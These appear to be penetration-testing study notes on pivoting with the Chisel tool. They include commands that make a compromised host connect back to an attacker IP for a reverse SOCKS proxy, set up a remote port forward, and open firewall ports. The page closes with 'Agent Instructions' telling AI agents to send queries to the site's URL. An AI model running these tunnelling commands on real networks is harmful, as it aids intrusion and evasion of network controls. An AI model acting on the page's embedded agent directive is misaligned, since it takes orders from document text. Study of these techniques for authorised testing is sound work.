# Chisel **Chisel** works in a client server way so the chisel binary needs to be on both the attacking machine and the compromised server. ## Reverse SOCKS Proxy First we need to set up the **chisel server** on our attacking machine ```bash pingchisel server -p 1335 --reverse & ``` Next set up the client on the compromised server ```bash ./chisel client 10.50.102.164:1335 R:socks & ``` * R:socks * R means **remotes**. This tells chisel that the server is waiting for a proxy or port forward to be made The connection will be made on port 1335 but the actual proxy is opened on port **1080**. So we will be using **1080** to send traffic through the proxy. ## Remote Port Forward A remote port forward is when we **connect back** from a compromised target to create the forward. Start the chisel server on the compromised host (you will also have to open up the firewall port) ```bash ./chisel_windows.exe server -p 15997 --socks5 ``` ```powerquery netsh advfirewall firewall add rule name="Chisel-Adot8" dir=in action=allow protocol=tcp localport=15997 ``` OR ```bash firewall-cmd --zone=public --add-port 15997/tcp ``` Connect to the chisel server ```bash chisel client 10.200.101.150:15997 5005:socks ``` {% hint style="info" %} For a local port forward it would be exactly the same except the compromised server becomes the **chisel server** and your attacking machine becomes the **chisel client** {% endhint %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://pnpt.adot8.com/post-exploitation/pivoting/chisel.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.